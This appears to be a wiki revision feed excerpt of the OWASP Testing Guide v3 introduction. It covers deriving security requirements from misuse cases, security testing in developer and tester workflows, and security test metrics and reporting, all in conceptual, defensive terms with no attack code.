*Encrypt authentication data in storage and transit to mitigate risk of information disclosure and authentication protocol attacks&lt;br /&gt;
*Encrypt passwords using non reversible encryption such as using a digest (e.g., HASH) and a seed to prevent dictionary attacks&lt;br /&gt;
*Lock out accounts after reaching a logon failure threshold and enforce password complexity to mitigate risk of brute force password attacks&lt;br /&gt;
*Display generic error messages upon validation of credentials to mitigate risk of account harvesting/enumeration&lt;br /&gt;
*Mutually authenticate client and server to prevent non-repudiation and Man In the Middle (MiTM) attacks&lt;br /&gt;
&lt;br /&gt;
Threat modeling artifacts such as threat trees and attack libraries can be useful to derive the negative test scenarios. A threat tree will assume a root attack (e.g., attacker might be able to read other users' messages) and identify different exploits of security controls (e.g., data validation fails because of a SQL injection vulnerability) and necessary countermeasures (e.g., implement data validation and parametrized queries) that could be validated to be effective in mitigating such attacks.&lt;br /&gt;
&lt;br /&gt;
===Security Requirements Derivation Through Use and Misuse Cases===&lt;br /&gt;
Pre-requisite in describing the application functionality is to understand what the application is supposed to do and how. This can be done by describing ''use cases''. Use cases, in the graphical form as commonly used in software engineering, show the interactions of actors and their relations, and help to identify the actors in the application, their relationships, the intended sequence of actions for each scenario, alternative actions, special requirements, and pre- and post-conditions. Similar to use cases, ''misuse and abuse cases'' [19] describe unintended and malicious use scenarios of the application. These misuse cases provide a way to describe scenarios of how an attacker could misuse and abuse the application. By going through the individual steps in a use scenario and thinking about how it can be maliciously exploited, potential flaws or aspects of the application that are not well-defined can be discovered. The key is to describe all possible or, at least, the most critical use and misuse scenarios. Misuse scenarios allow the analysis of the application from the attacker's point of view and contribute to identifying potential vulnerabilities and the countermeasures that need to be implemented to mitigate the impact caused by the potential exposure to such vulnerabilities. Given all of the use and abuse cases, it is important to analyze them to determine which of them are the most critical ones and need to be documented in security requirements. The identification of the most critical misuse and abuse cases drives the documentation of security requirements and the necessary controls where security risks should be mitigated.&lt;br /&gt;
&lt;br /&gt;
To derive security requirements from use and misuse case [20] , it is important to define the functional scenarios and the negative scenarios, and put these in graphical form. In the case of derivation of security requirements for authentication, for example, the following step-by-step methodology can be followed.&lt;br /&gt;
&lt;br /&gt;
*Step 1: Describe the Functional Scenario: User authenticates by supplying username and password. The application grants access to users based upon authentication of user credentials by the application and provides specific errors to the user when validation fails.&lt;br /&gt;
&lt;br /&gt;
*Step 2: Describe the Negative Scenario:  Attacker breaks the authentication through a brute force/dictionary attack of passwords and account harvesting vulnerabilities in the application. The validation errors provide specific information to an attacker to guess which accounts are actually valid, registered accounts (usernames). The attacker, then, will try to brute force the password for such a valid account. A brute force attack to four minimum length all digit passwords can succeed with a limited number of attempts (i.e., 10^4).&lt;br /&gt;
&lt;br /&gt;
*Step 3: Describe Functional and Negative Scenarios With Use and Misuse Case: The graphical example in Figure below depicts the derivation of security requirements via use and misuse cases. The functional scenario consists of the user actions (entering username and password) and the application actions (authenticating the user and providing an error message if validation fails). The misuse case consists of the attacker actions, i.e., trying to break authentication by brute forcing the password via a dictionary attack and by guessing the valid usernames from error messages. By graphically representing the threats to the user actions (misuses), it is possible to derive the countermeasures as the application actions that mitigate such threats.&lt;br /&gt;
[[Image:UseAndMisuseCase.jpg]]&lt;br /&gt;
&lt;br /&gt;
*Step 4: Elicit The Security Requirements. In this case, the following security requirements for authentication are derived: &lt;br /&gt;
:1) Passwords need to be alphanumeric, lower and upper case and minimum of seven character length&lt;br /&gt;
:2) Accounts need to lockout after five unsuccessful login attempt&lt;br /&gt;
:3) Logon error messages need to be generic&lt;br /&gt;
These security requirements need to be documented and tested.&lt;br /&gt;
&lt;br /&gt;
===Security Tests Integrated in Developers' and Testers' Workflows===&lt;br /&gt;
'''Developers' Security Testing Workflow'''&amp;lt;br&amp;gt;&lt;br /&gt;
Security testing during the development phase of the SDLC represents the first opportunity for developers to ensure that individual software components that they have developed are security tested before they are integrated with other components and built into the application. Software components might consist of software artifacts such as functions, methods, and classes, as well as application programming interfaces, libraries, and executables. For security testing, developers can rely on the results of the source code analysis to verify statically that the developed source code does not include potential vulnerabilities and is compliant with the secure coding standards. Security unit tests can further verify dynamically (i.e., at run time) that the components function as expected.  Before integrating both new and existing code changes in the application build, the results of the static and dynamic analysis should be reviewed and validated. &lt;br /&gt;
The validation of source code before integration in application builds is usually the responsibility of the senior developer. Such senior developer is also the subject matter expert in software security and his role is to lead the secure code review and make decisions whether to accept the code to be released in the application build or to require further changes and testing. This secure code review workflow can be enforced via formal acceptance as well as a check in a workflow management tool. For example, assuming the typical defect management workflow used for functional bugs, security bugs that have been fixed by a developer can be reported on a defect or change management system. The build master can look at the test results reported by the developers in the tool and grant approvals for checking in the code changes into the application build.&lt;br /&gt;
&lt;br /&gt;
'''Testers' Security Testing Workflow'''&amp;lt;br&amp;gt;&lt;br /&gt;
After components and code changes are tested by developers and checked in to the application build, the most likely next step in the software development process workflow is to perform tests on the application as a whole entity. This level of testing is usually referred to as integrated test and system level test. When security tests are part of these testing activities, they can be used to validate both the security functionality of the application as a whole, as well as the exposure to application level vulnerabilities. These security tests on the application include both white box testing, such as source code analysis, and black box testing, such as penetration testing. Gray box testing is similar to Black box testing. In a gray box testing we can assume we have some partial knowledge about the session management of our application, and that should help us in understanding whether the logout and timeout functions are properly secured.&lt;br /&gt;
&lt;br /&gt;
The target for the security tests is the complete system that is the artifact that will be potentially attacked and includes both whole source code and the executable. One peculiarity of security testing during this phase is that it is possible for security testers to determine whether vulnerabilities can be exploited and expose the application to real risks. &lt;br /&gt;
These include common web application vulnerabilities, as well as security issues that have been identified earlier in the SDLC with other activities such as threat modeling, source code analysis, and secure code reviews. &lt;br /&gt;
&lt;br /&gt;
Usually, testing engineers, rather then software developers, perform security tests when the application is in scope for integration system tests. Such testing engineers have security knowledge of web application vulnerabilities, black box and white box security testing techniques, and own the validation of security requirements in this phase. In order to perform such security tests, it is a pre-requisite that security test cases are documented in the security testing guidelines and procedures.&lt;br /&gt;
&lt;br /&gt;
A testing engineer who validates the security of the application in the integrated system environment might release the application for testing in the operational environment (e.g., user acceptance tests). At this stage of the SDLC (i.e., validation), the application functional testing is usually a responsibility of QA testers, while white-hat hackers/security consultants are usually responsible for security testing. Some organizations rely on their own specialized ethical hacking team in order to conduct such tests when a third party assessment is not required (such as for auditing purposes). &lt;br /&gt;
&lt;br /&gt;
Since these tests are the last resort for fixing vulnerabilities before the application is released to production, it is important that such issues are addressed as recommended by the testing team (e.g., the recommendations can include code, design, or configuration change). At this level, security auditors and information security officers discuss the reported security issues and analyze the potential risks according to information risk management procedures. Such procedures might require the developer team to fix all high risk vulnerabilities before the application could be deployed, unless such risks are acknowledged and accepted.&lt;br /&gt;
&lt;br /&gt;
===Developers' Security Tests===&lt;br /&gt;
'''Security Testing in the Coding Phase: Unit Tests'''&amp;lt;br&amp;gt;&lt;br /&gt;
From the developer’s perspective, the main objective of security tests is to validate that code is being developed in compliance with secure coding standards requirements. Developers' own coding artifacts such as functions, methods, classes, APIs, and libraries need to be functionally validated before being integrated into the application build. &lt;br /&gt;
&lt;br /&gt;
The security requirements that developers have to follow should be documented in secure coding standards and validated with static and dynamic analysis. As testing activity following a secure code review, unit tests can validate that code changes required by secure code reviews are properly implemented. Secure code reviews and source code analysis through source code analysis tools help developers in identifying security issues in source code as it is developed. By using unit tests and dynamic analysis (e.g., debugging) developers can validate the security functionality of components as well as verify that the countermeasures being developed mitigate any security risks previously identified through threat modeling and source code analysis.  &lt;br /&gt;
&lt;br /&gt;
A good practice for developers is to build security test cases as a generic security test suite that is part of the existing unit testing framework. A generic security test suite could be derived from previously defined use and misuse cases to security test functions, methods and classes. A generic security test suite might include security test cases to validate both positive and negative requirements for security controls such as:&lt;br /&gt;
* Authentication &amp;amp; Access Control&lt;br /&gt;
* Input Validation &amp;amp; Encoding&lt;br /&gt;
* Encryption&lt;br /&gt;
* User and Session Management&lt;br /&gt;
* Error and Exception Handling&lt;br /&gt;
* Auditing and Logging&lt;br /&gt;
&lt;br /&gt;
Developers empowered with a source code analysis tool integrated into their IDE, secure coding standards, and a security unit testing framework can assess and verify the security of the software components being developed. Security test cases can be run to identify potential security issues that have root causes in source code: besides input and output validation of parameters entering and exiting the components, these issues include authentication and authorization checks done by the component, protection of the data within the component, secure exception and error handling, and secure auditing and logging. Unit test frameworks such as Junit, Nunit, and CUnit can be adapted to verify security test requirements. In the case of security functional tests, unit level tests can test the functionality of security controls at the software component level, such as functions, methods, or classes. For example, a test case could validate input and output validation (e.g., variable sanitization) and boundary checks for variables by asserting the expected functionality of the component.&lt;br /&gt;
&lt;br /&gt;
The threat scenarios identified with use and misuse cases can be used to document the procedures for testing software components. In the case of authentication components, for example, security unit tests can assert the functionality of setting an account lockout as well as the fact that user input parameters cannot be abused to bypass the account lockout (e.g., by setting the account lockout counter to a negative number). At the component level, security unit tests can validate positive assertions as well as negative assertions, such as errors and exception handling. Exceptions should be caught without leaving the system in an insecure state, such as potential denial of service caused by resources not being deallocated (e.g., connection handles not closed within a final statement block), as well as potential elevation of privileges (e.g., higher privileges acquired before the exception is thrown and not re-set to the previous level before exiting the function). Secure error handling can validate potential information disclosure via informative error messages and stack traces. &lt;br /&gt;
&lt;br /&gt;
Unit level security test cases can be developed by a security engineer who is the subject matter expert in software security and is also responsible for validating that the security issues in the source code have been fixed and can be checked into the integrated system build.  Typically, the manager of the application builds also makes sure that third-party libraries and executable files are security assessed for potential vulnerabilities before being integrated in the application build.&lt;br /&gt;
&lt;br /&gt;
Threat scenarios for common vulnerabilities that have root causes in insecure coding can also be documented in the developer’s security testing guide. When a fix is implemented for a coding defect identified with source code analysis, for example, security test cases can verify that the implementation of the code change follows the secure coding requirements documented in the secure coding standards. &lt;br /&gt;
&lt;br /&gt;
Source code analysis and unit tests can validate that the code change mitigates the vulnerability exposed by the previously identified coding defect. The results of automated secure code analysis can also be used as automatic check-in gates for version control: software artifacts cannot be checked into the build with high or medium severity coding issues.&lt;br /&gt;
&lt;br /&gt;
===Functional Testers' Security Tests===&lt;br /&gt;
'''Security Testing During the Integration and Validation Phase: Integrated System Tests and Operation Tests'''&amp;lt;br&amp;gt;&lt;br /&gt;
The main objective of integrated system tests is to validate the “defense in depth” concept, that is, that the implementation of security controls provides security at different layers. For example, the lack of input validation when calling a component integrated with the application is often a factor that can be tested with integration testing. &lt;br /&gt;
&lt;br /&gt;
The integration system test environment is also the first environment where testers can simulate real attack scenarios as can be potentially executed by a malicious external or internal user of the application. Security testing at this level can validate whether vulnerabilities are real and can be exploited by attackers. For example, a potential vulnerability found in source code can be rated as high risk because of the exposure to potential malicious users, as well as because of the potential impact (e.g., access to confidential information).&lt;br /&gt;
Real attack scenarios can be tested with both manual testing techniques and penetration testing tools. Security tests of this type are also referred to as ethical hacking tests. From the security testing perspective, these are risk driven tests and have the objective to test the application in the operational environment. The target is the application build that is representative of the version of the application being deployed into production.&lt;br /&gt;
&lt;br /&gt;
The execution of security in the integration and validation phase is critical to identifying vulnerabilities due to integration of components as well as validating the exposure of such vulnerabilities. Since application security testing requires a specialized set of skills, which includes both software and security knowledge and is not typical of security engineers, organizations are often required to security-train their software developers on ethical hacking techniques, security assessment procedures and tools. A realistic scenario is to develop such resources in-house and document them in security testing guides and procedures that take into account the developer’s security testing knowledge. A so called “security test cases cheat list or check-list”, for example, can provide simple test cases and attack vectors that can be used by testers to validate exposure to common vulnerabilities such as spoofing, information disclosures, buffer overflows, format strings, SQL injection and XSS injection, XML, SOAP, canonicalization issues, denial of service and managed code and ActiveX controls (e.g., .NET). A first battery of these tests can be performed manually with a very basic knowledge of software security. The first objective of security tests might be the validation of a set of minimum security requirements. These security test cases might consist of manually forcing the application into error and exceptional states, and gathering knowledge from the application behavior. For example, SQL injection vulnerabilities can be tested manually by injecting attack vectors through user input and by checking if SQL exceptions are thrown back the user. The evidence of a SQL exception error might be a manifestation of a vulnerability that can be exploited. A more in-depth security test might require the tester’s knowledge of specialized testing techniques and tools. Besides source code analysis and penetration testing, these techniques include, for example, source code and binary fault injection, fault propagation analysis and code coverage, fuzz testing, and reverse engineering. The security testing guide should provide procedures and recommend tools that can be used by security testers to perform such in-depth security assessments.&lt;br /&gt;
&lt;br /&gt;
The next level of security testing after integration system tests is to perform security tests in the user acceptance environment. There are unique advantages to performing security tests in the operational environment. The user acceptance tests environment (UAT) is the one that is most representative of the release configuration, with the exception of the data (e.g., test data is used in place of real data). A characteristic of security testing in UAT is testing for security configuration issues. In some cases these vulnerabilities might represent high risks. For example, the server that hosts the web application might not be configured with minimum privileges, valid SSL certificate and secure configuration, essential services disabled and web root directory not cleaned from test and administration web pages.&lt;br /&gt;
&lt;br /&gt;
===Security Test Data Analysis and Reporting===&lt;br /&gt;
'''Goals for Security Test Metrics and Measurements'''&amp;lt;br&amp;gt;&lt;br /&gt;
The definition of the goals for the security testing metrics and measurements is a pre-requisite for using security testing data for risk analysis and management processes. For example, a measurement such as the total number of vulnerabilities found with security tests might quantify the security posture of the application. These measurements also help to identify security objectives for software security testing: for example, reducing the number of vulnerabilities to an acceptable number (minimum) before the application is deployed into production. &lt;br /&gt;
&lt;br /&gt;
Another manageable goal could be to compare the application security posture against a baseline to assess improvements in application security processes. For example, the security metrics baseline might consist of an application that was tested only with penetration tests. The security data obtained from an application that was also security tested during coding should show an improvement (e.g., fewer number of vulnerabilities) when compared with the baseline.&lt;br /&gt;
&lt;br /&gt;
In traditional software testing, the number of software defects, such as the bugs found in an application, could provide a measure of software quality. Similarly, security testing can provide a measure of software security. From the defect management and reporting perspective, software quality and security testing can use similar categorizations for root causes and defect remediation efforts. From the root cause perspective, a security defect can be due to an error in design (e.g., security flaws) or due to an error in coding (e.g., security bug). From the perspective of the effort required to fix a defect, both security and quality defects can be measured in terms of developer hours to implement the fix, the tools and resources required to fix, and, finally, the cost to implement the fix.&lt;br /&gt;
&lt;br /&gt;
A characteristic of security test data, compared to quality data, is the categorization in terms of the threat, the exposure of the vulnerability, and the potential impact posed by the vulnerability to determine the risk. Testing applications for security consists of managing technical risks to make sure that the application countermeasures meet acceptable levels. For this reason, security testing data needs to support the security risk strategy at critical checkpoints during the SDLC. For example, vulnerabilities found in source code with source code analysis represent an initial measure of risk. Such measure of risk (e.g., high, medium, low) for the vulnerability can be calculated by determining the exposure and likelihood factors and, further, by validating such vulnerability with penetration tests. The risk metrics associated to vulnerabilities found with security tests empower business management to make risk management decisions, such as to decide whether risks can be accepted, mitigated, or transferred at different levels within the organization (e.g., business as well as technical).&lt;br /&gt;
&lt;br /&gt;
When evaluating the security posture of an application, it is important to take into consideration certain factors, such as the size of the application being developed. Application size has been statistically proven to be related to the number of issues found in the application with tests. One measure of application size is the number of line of code (LOC) of the application. Typically,  software quality defects range from about 7 to 10 defects per thousand lines of new and changed code [21]. Since testing can reduce the overall number by about 25% with one test alone, it is logical for larger size applications to be tested more and more often than smaller size applications.&lt;br /&gt;
&lt;br /&gt;
When security testing is done in several phases of the SDLC, the test data could prove the capability of the security tests in detecting vulnerabilities as soon as they are introduced, and prove the effectiveness of removing them by implementing countermeasures at different checkpoints of the SDLC. A measurement of this type is also defined as “containment metrics” and provides a measure of the ability of a security assessment performed at each phase of the development process to maintain security within each phase. These containment metrics are also a critical factor in lowering the cost of fixing the vulnerabilities, since it is less expensive to deal with the vulnerabilities when they are found (in the same phase of the SDLC), rather then fixing them later in another phase. &lt;br /&gt;
&lt;br /&gt;
Security test metrics can support security risk, cost, and defect management analysis when it is associated with tangible and timed goals such as: &lt;br /&gt;
*Reducing the overall number of vulnerabilities by 30%&lt;br /&gt;
*Security issues are expected to be fixed by a certain deadline (e.g., before beta release) &lt;br /&gt;
&lt;br /&gt;
Security test data can be absolute, such as the number of vulnerabilities detected during manual code review, as well as comparative, such as the number of vulnerabilities detected in code reviews vs. penetration tests. To answer questions about the quality of the security process, it is important to determine a baseline for what could be considered acceptable and good. &lt;br /&gt;
&lt;br /&gt;
Security test data can also support specific objectives of the security analysis such as compliance with security regulations and information security standards, management of security processes, the identification of security root causes and process improvements, and security costs vs. benefits analysis.&lt;br /&gt;
&lt;br /&gt;
When security test data is reported it has to provide metrics to support the analysis. The scope of the analysis is the interpretation of test data to find clues about the security of the software being produced as well the effectiveness of the process. &lt;br /&gt;
Some examples of clues supported by security test data can be:&lt;br /&gt;
*Are vulnerabilities reduced to an acceptable level for release?&lt;br /&gt;
*How does the security quality of this product compare with similar software products?&lt;br /&gt;
*Are all security test requirements being met? &lt;br /&gt;
*What are the major root causes of security issues?&lt;br /&gt;
*How numerous are security flaws compared to security bugs?&lt;br /&gt;
*Which security activity is most effective in finding vulnerabilities?&lt;br /&gt;
*Which team is more productive in fixing security defects and vulnerabilities?&lt;br /&gt;
*Which percentage of overall vulnerabilities are high risk?&lt;br /&gt;
*Which tools are most effective in detecting security vulnerabilities?&lt;br /&gt;
*Which kind of security tests are most effective in finding vulnerabilities (e.g., white box vs. black box) tests?&lt;br /&gt;
*How many security issues are found during secure code reviews?&lt;br /&gt;
*How many security issues are found during secure design reviews?&lt;br /&gt;
&lt;br /&gt;
In order to make a sound judgment using the testing data, it is important to have a good understanding of the testing process as well as the testing tools. A tool taxonomy should be adopted to decide which security tools should be used. Security tools can be qualified as being good at finding common known vulnerabilities targeting different artifacts.&lt;br /&gt;
The issue is that the unknown security issues are not tested: the fact that you come out clean it does not mean that your software or application is good. Some studies [22] have demonstrated that, at best, tools can find 45% of overall vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
Even the most sophisticated automation tools are not a match for an experienced security tester: just relying on successful test results from automation tools will give security practitioners a false sense of security.  Typically, the more experienced the security testers are with the security testing methodology and testing tools, the better the results of the security test and analysis will be. It is important that managers making an investment in security testing tools also consider an investment in hiring skilled human resources as well as security test training.&lt;br /&gt;
&lt;br /&gt;
'''Reporting Requirements'''&amp;lt;br&amp;gt;&lt;br /&gt;
The security posture of an application can be characterized from the perspective of the effect, such as number of vulnerabilities and the risk rating of the vulnerabilities, as well as from the perspective of the cause (i.e., origin) such as coding errors, architectural flaws, and configuration issues.  &lt;br /&gt;
&lt;br /&gt;
Vulnerabilities can be classified according to different criteria. This can be a statistical categorization, such as the OWASP Top 10 and WASC (Web Application Security Statistics) project, or related to defensive controls as in the case of WASF (Web Application Security Framework) categorization.&lt;br /&gt;
&lt;br /&gt;
When reporting security test data, the best practice is to include the following information, besides the categorization of each vulnerability by type:&lt;br /&gt;
*The security threat that the issue is exposed to&lt;br /&gt;
*The root cause of security issues (e.g., security bugs, security flaw)&lt;br /&gt;
*The testing technique used to find it&lt;br /&gt;
*The remediation of the vulnerability (e.g., the countermeasure) &lt;br /&gt;
*The risk rating of the vulnerability (High, Medium, Low)&lt;br /&gt;
&lt;br /&gt;
By describing what the security threat is, it will be possible to understand if and why the mitigation control is ineffective in mitigating the threat. &lt;br /&gt;
&lt;br /&gt;
Reporting the root cause of the issue can help pinpoint what needs to be fixed: in the case of a white box testing, for example, the software security root cause of the vulnerability will be the offending source code. &lt;br /&gt;
&lt;br /&gt;
Once issues are reported, it is also important to provide guidance to the software developer on how to re-test and find the vulnerability. This might involve using a white box testing technique (e.g., security code review with a static code analyzer) to find if the code is vulnerable. If a vulnerability can be found via a black box technique (penetration test), the test report also needs to provide information on how to validate the exposure of the vulnerability to the front end (e.g., client).&lt;br /&gt;
&lt;br /&gt;
The information about how to fix the vulnerability should be detailed enough for a developer to implement a fix. It should provide secure coding examples, configuration changes, and provide adequate references.&lt;br /&gt;
&lt;br /&gt;
Finally the risk rating helps to prioritize the remediation effort. Typically, assigning a risk rating to the vulnerability involves a risk analysis based upon factors such as impact and exposure.&lt;br /&gt;
&lt;br /&gt;
'''Business Cases'''&amp;lt;br&amp;gt; &lt;br /&gt;
For the security test metrics to be useful, they need to provide value back to the organization's security test data stakeholders, such as project managers, developers, information security offices, auditors, and chief information officers. The value can be in terms of the business case that each project stakeholder has in terms of role and responsibility.&lt;br /&gt;
&lt;br /&gt;
Software developers look at security test data to show that software is coded more securely and efficiently, so that they can make the case of using source code analysis tools as well as following secure coding standards and attending software security training. &lt;br /&gt;
&lt;br /&gt;
Project managers look for data that allows them to successfully manage and utilize security testing activities and resources according to the project plan. To project managers, security test data can show that projects are on schedule and moving on target for delivery dates and are getting better during tests. &lt;br /&gt;
&lt;br /&gt;
Security test data also helps the business case for security testing if the initiative comes from information security officers (ISOs). For example, it can provide evidence that security testing during the SDLC does not impact the project delivery, but rather reduces the overall workload needed to address vulnerabilities later in production. &lt;br /&gt;
&lt;br /&gt;
To compliance auditors, security test metrics provide a level of software security assurance and confidence that security standard compliance is addressed through the security review processes within the organization. &lt;br /&gt;
&lt;br /&gt;
Finally, Chief Information Officers (CIOs) and Chief Information Security Officers (CISOs), responsible for the budget that needs to be allocated in security resources, look for derivation of a cost/benefit analysis from security test data to make informed decisions on which security activities and tools to invest. One of the metrics that support such analysis is the Return On Investment (ROI) in Security [23]. To derive such metrics from security test data, it is important to quantify the differential between the risk due to the exposure of vulnerabilities and the effectiveness of the security tests in mitigating the security risk, and factor this gap with the cost of the security testing activity or the testing tools adopted.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
[1] T. DeMarco, ''Controlling Software Projects: Management, Measurement and Estimation'', Yourdon Press, 1982&lt;br /&gt;
&lt;br /&gt;
[2] S. Payne, ''A Guide to Security Metrics'' - http://www.sans.org/reading_room/whitepapers/auditing/55.php&lt;br /&gt;
&lt;br /&gt;
[3] NIST, ''The economic impacts of inadequate infrastructure for software testing'' - http://www.nist.gov/public_affairs/releases/n02-10.htm&lt;br /&gt;
&lt;br /&gt;
[4] Ross Anderson, ''Economics and Security Resource Page'' - http://www.cl.cam.ac.uk/users/rja14/econsec.html &lt;br /&gt;
&lt;br /&gt;
[5] Denis Verdon, ''Teaching Developers To Fish'' - [[OWASP AppSec NYC 2004]]&lt;br /&gt;
&lt;br /&gt;
[6] Bruce Schneier, ''Cryptogram Issue #9'' - http://www.schneier.com/crypto-gram-0009.html&lt;br /&gt;
&lt;br /&gt;
[7] Symantec, ''Threat Reports'' -  http://www.symantec.com/business/theme.jsp?themeid=threatreport&lt;br /&gt;
&lt;br /&gt;
[8] FTC, ''The Gramm-Leach Bliley Act'' - http://www.ftc.gov/privacy/privacyinitiatives/glbact.html&lt;br /&gt;
&lt;br /&gt;
[9] Senator Peace and Assembly Member Simitian, ''SB 1386''- http://www.leginfo.ca.gov/pub/01-02/bill/sen/sb_1351-1400/sb_1386_bill_20020926_chaptered.html&lt;br /&gt;
&lt;br /&gt;
[10] European Union, ''Directive 96/46/EC on the protection of individuals with regard to the processing of personal data and on the free movement of such data'' -&lt;br /&gt;
http://ec.europa.eu/justice_home/fsj/privacy/docs/95-46-ce/dir1995-46_part1_en.pdf&lt;br /&gt;
&lt;br /&gt;
[11] NIST, '' Risk management guide for information technology systems'' - http://csrc.nist.gov/publications/nistpubs/800-30/sp800-30.pdf&lt;br /&gt;
&lt;br /&gt;
[12] SEI, Carnegie Mellon, ''Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE)'' - http://www.cert.org/octave/&lt;br /&gt;
&lt;br /&gt;
[13] Ken Thompson, ''Reflections on Trusting Trust, Reprinted from Communication of the ACM '' - http://cm.bell-labs.com/who/ken/trust.html''&lt;br /&gt;
&lt;br /&gt;
[14] Gary McGraw, ''Beyond the Badness-ometer'' - http://www.ddj.com/security/189500001&lt;br /&gt;
&lt;br /&gt;
[15] FFIEC, '' Authentication in an Internet Banking Environment'' - http://www.ffiec.gov/pdf/authentication_guidance.pdf&lt;br /&gt;
&lt;br /&gt;
[16] PCI Security Standards Council, ''PCI Data Security Standard'' -https://www.pcisecuritystandards.org/security_standards/pci_dss.shtml &lt;br /&gt;
&lt;br /&gt;
[17] MSDN, ''Cheat Sheet: Web Application Security Frame'' - http://msdn.microsoft.com/en-us/library/ms978518.aspx#tmwacheatsheet_webappsecurityframe &lt;br /&gt;
&lt;br /&gt;
[18] MSDN, ''Improving Web Application Security, Chapter 2, Threat And Countermeasures'' - http://msdn.microsoft.com/en-us/library/aa302418.aspx&lt;br /&gt;
&lt;br /&gt;
[19] Gil Regev, Ian Alexander,Alain Wegmann, ''Use Cases and Misuse Cases Model the Regulatory Roles of Business Processes'' - http://easyweb.easynet.co.uk/~iany/consultancy/regulatory_processes/regulatory_processes.htm&lt;br /&gt;
&lt;br /&gt;
[20] Sindre,G. Opdmal A., '' Capturing Security Requirements Through Misuse Cases ' - http://folk.uio.no/nik/2001/21-sindre.pdf&lt;br /&gt;
&lt;br /&gt;
[21] Security Across the Software Development Lifecycle Task Force, ''Referred Data from Caper Johns, Software Assessments, Benchmarks and Best Practices'' -http://www.cyberpartnership.org/SDLCFULL.pdf&lt;br /&gt;
&lt;br /&gt;
[22] MITRE, ''Being Explicit About Weaknesses, Slide 30, Coverage of CWE'' -http://cwe.mitre.org/documents/being-explicit/BlackHatDC_BeingExplicit_Slides.ppt&lt;br /&gt;
&lt;br /&gt;
[23] Marco Morana, ''Building Security Into The Software Life Cycle, A Business Case'' - http://www.blackhat.com/presentations/bh-usa-06/bh-us-06-Morana-R3.0.pdf&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_Guide_Introduction&amp;diff=61740</id>
		<title>Testing Guide Introduction</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_Guide_Introduction&amp;diff=61740"/>
				<updated>2009-05-25T20:47:38Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Functional and Non Functional Test Requirements */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
=== The OWASP Testing Project ===&lt;br /&gt;
----&lt;br /&gt;
The OWASP Testing Project has been in development for many years. With this project, we wanted to help people understand the ''what'', ''why'', ''when'', ''where'', and ''how'' of testing their web applications, and not just provide a simple checklist or prescription of issues that should be addressed. The outcome of this project is a complete Testing Framework, from which others can build their own testing programs or qualify other people’s processes. The Testing Guide describes in details both the general Testing Framework and the techniques required to implement the framework in practice.&lt;br /&gt;
&lt;br /&gt;
Writing the Testing Guide has proven to be a difficult task. It has been a challenge to obtain consensus and develop the content that allows people to apply the concepts described here, while enabling them to work in their own environment and culture. It has also been a challenge to change the focus of web application testing from penetration testing to testing integrated in the software development life cycle. &lt;br /&gt;
&lt;br /&gt;
However, we are very satisfied with the results we have reached. Many industry experts and those responsible for software security at some of the largest companies in the world are validating the Testing Framework. This framework helps organizations test their web applications in order to build reliable and secure software, rather than simply highlighting areas of weakness, although the latter is certainly a byproduct of many of OWASP’s guides and checklists. As such, we have made some hard decisions about the appropriateness of certain testing techniques and technologies, which we fully understand will not be agreed upon by everyone. However, OWASP is able to take the high ground and change culture over time through awareness and education based on consensus and experience.&lt;br /&gt;
&lt;br /&gt;
The rest of this guide is organized as follows. This introduction covers the pre-requisites of testing web applications: the scope of testing, the principles of successful testing, and testing techniques. Chapter 3 presents the OWASP Testing Framework and explains its techniques and tasks in relation to the various phases of the software development life cycle. Chapter 4 covers how to test for specific vulnerabilities (e.g., SQL Injection) by code inspection and penetration testing. &lt;br /&gt;
&lt;br /&gt;
'''Measuring (in)security: the Economics of Insecure Software'''&amp;lt;br&amp;gt;&lt;br /&gt;
A basic tenet of software engineering is that you can't control what you can't measure [1]. Security testing is no different. Unfortunately, measuring security is a notoriously difficult process. We will not cover this topic in detail here, since it would take a guide on its own (for an introduction, see [2]). &lt;br /&gt;
&lt;br /&gt;
One aspect that we want to emphasize, however, is that security measurements are, by necessity, about both the specific, technical issues (e.g., how prevalent a certain vulnerability is) and how these affect the economics of software. We find that most technical people understand at least the basic issues, or have a deeper understanding, of the vulnerabilities. Sadly, few are able to translate that technical knowledge into monetary terms, and, thereby, quantify the potential cost of vulnerabilities to the application owner's business. We believe that until this happens, CIOs will not be able to develop an accurate return on security investment and, subsequently, assign appropriate budgets for software security.&amp;lt;br/&amp;gt;&lt;br /&gt;
While estimating the cost of insecure software may appear a daunting task, recently there has been a significant amount of work in this direction. For example, in June 2002, the US National Institute of Standards (NIST) published a survey on the cost of insecure software to the US economy due to inadequate software testing [3]. Interestingly, they estimate that a better testing infrastructure would save more than a third of these costs, or about $22 billion a year. More recently, the links between economics and security have been studied by academic researchers. See [4] for more information about some of these efforts.&lt;br /&gt;
&lt;br /&gt;
The framework described in this document encourages people to measure security throughout their entire development process. They can then relate the cost of insecure software to the impact it has on their business, and consequently develop appropriate business decisions (resources) to manage the risk. Remember: measuring and testing web applications is even more critical than for other software, since web applications are exposed to millions of users through the Internet.&lt;br /&gt;
&lt;br /&gt;
'''What is Testing'''&amp;lt;br&amp;gt;&lt;br /&gt;
What do we mean by testing? During the development life cycle of a web application, many things need to be tested. The Merriam-Webster Dictionary describes testing as: &lt;br /&gt;
* To put to test or proof. &lt;br /&gt;
* To undergo a test. &lt;br /&gt;
* To be assigned a standing or evaluation based on tests. &lt;br /&gt;
For the purposes of this document, testing is a process of comparing the state of a system/application against a set of criteria. In the security industry, people frequently test against a set of mental criteria that are neither well defined nor complete. For this reason and others, many outsiders regard security testing as a black art. This document’s aim is to change that perception and to make it easier for people without in-depth security knowledge to make a difference. &lt;br /&gt;
&lt;br /&gt;
'''Why Testing'''&amp;lt;br&amp;gt;&lt;br /&gt;
